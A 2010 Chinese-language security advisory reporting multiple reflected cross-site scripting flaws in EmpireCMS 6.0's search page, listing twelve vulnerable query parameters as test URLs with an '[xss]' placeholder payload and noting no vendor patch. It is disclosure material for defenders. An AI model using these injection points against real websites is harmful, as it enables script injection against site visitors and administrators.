帝国(EmpireCMS)6.0 /search/keyword/index.php 存在多个跨站漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-06-03

影响版本:
帝国(EmpireCMS)6.0

漏洞描述:
帝国软件是一家专注于网络软件开发的科技公司,其主营产品“帝国网站管理系统(EmpireCMS)”是目前国内应用最广泛的CMS程序。通过多年的不断创新与完善,使系统集安全、强大、稳定、灵活于一身。

目前EmpireCMS程序已经广泛应用在国内数十万家网站,覆盖国内上千万上网人群,并经过上千家知名网站的严格检测,被称为国内最稳定的CMS系统。

/search/keyword/index.php 存在多个跨站漏洞

<*参考
http://syue.com/News/Bug/8909.html
*>

测试方法:

http://***.com/search/keyword/index.php?show=3">[xss]
http://***.com/search/keyword/index.php?classid=3">[xss]
http://***.com/search/keyword/index.php?tbname=3">[xss]
http://***.com/search/keyword/index.php?tempid=3">[xss]
http://***.com/search/keyword/index.php?starttime=3">[xss]
http://***.com/search/keyword/index.php?endtime=3">[xss]
http://***.com/search/keyword/index.php?startprice=3">[xss]
http://***.com/search/keyword/index.php?endprice=3">[xss]
http://***.com/search/keyword/index.php?orderby=3">[xss]
http://***.com/search/keyword/index.php?myorder=3">[xss]
http://***.com/search/keyword/index.php?keyboard=3">[xss]
http://***.com/search/keyword/index.php?allsame=3">[xss]

安全建议:
厂商补丁:

phome.net
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phome.net